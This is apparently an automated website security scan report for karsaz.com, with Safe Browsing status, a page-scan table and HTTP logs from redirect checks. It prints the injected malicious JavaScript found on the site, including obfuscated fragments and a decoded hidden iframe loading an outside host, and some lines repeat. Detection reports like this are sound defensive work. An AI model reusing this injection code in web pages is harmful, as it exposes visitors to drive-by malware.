Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=karsaz.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://karsaz.com/ | 200 OK Content-Length: 6440 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var W8RAJ="797a3E";var R2ij4P1="UC65UC6DUC65UC6";var SxsQ97="7a767a507a347a";var ookN="(unescape";var aElY3ukq="p9YF='9V%469V%";var WsE4="%4E9V%42";var lIGVr="227a3C7";var pU8Y="DUC65UC6";pU8Y="C6FUC63UC75UC6"+pU8Y;var BPg3BX="7a657a6E7a747";var ZWWeo1h="277a2B7a";var ay7ixd9Z="6FUC7y9XUC";var c6EZv="XUC6CUC27UC3";var uV6ta="J.replace(/5V";var j30SfRAD="79V%3B9V%4";var oSZLpGm7="6E7a747a2E7a67";var hW2NS="797a3D7a3D7a6";var V2qQ="277a3E7a3C";var MdVNo="F7a367a4C7a627a";var nRyRt="V%3B9V%469V%569 Decoded script: var wF1udAl='7a767a617a727a207a727a4F7a367a4C7a627a4E7a447a3D7a227a3C7a647a697a767a207a697a647a3D7a277a477a377a767a507a347a667a677a697a277a3E7a3C7a2F7a647a697a767a3E7a227a3B7a697a667a287a647a6F7a637a757a6D7a657a6E7a747a2E7a627a6F7a647a797a3D7a3D7a6E7a757a6C7a6C7a297a727a4F7a367a4C7a627a4E7a447a3D7a277a3C7a627a6F7a647a797a3E7a277a2B7a727a4F7a367a4C7a627a4E7a447a2B7a277a3C7a2F7a627a6F7a647a797a3E7a277a3B7a647a6F7a637a757a6D7a657a6E7a747a2E7a777a727a697a747a657a207a287a727a4F7a367a4C7a627a4E7a var FVora=document.createElement('iframe');FVora.src='http://fruits.lemonia.ws/Tbl'; var FVora=document.createElement('iframe');FVora.src='http://fruits.lemonia.ws/Tbl'; FVora.width='1';FVora.height='1';FVora.name='zhq4NBm';FVora.style.visibility='hidden'; FVora.width='1';FVora.height='1';FVora.name='zhq4NBm';FVora.style.visibility='hidden'; <div id='G7vP4fgi'></div> Antivirus reports:
| ||
http://karsaz.com/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: karsaz.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 20 Jan 2015 10:21:28 GMT
Accept-Ranges: bytes
ETag: "19a0439-1928-3be93eebd8640"
Server: Apache/2.2.15
Content-Length: 6440
Content-Type: text/html; charset=UTF-8
Last-Modified: Mon, 26 May 2003 16:45:05 GMT
...6440 bytes of data.
GET / HTTP/1.1
Host: karsaz.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 20 Jan 2015 10:21:28 GMT
Accept-Ranges: bytes
ETag: "19a0439-1928-3be93eebd8640"
Server: Apache/2.2.15
Content-Length: 6440
Content-Type: text/html; charset=UTF-8
Last-Modified: Mon, 26 May 2003 16:45:05 GMT
...6440 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: karsaz.com
Referer: http://www.google.com/search?q=karsaz.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: karsaz.com
Referer: http://www.google.com/search?q=karsaz.com
Result:
The result is similar to the first query. There are no suspicious redirects found.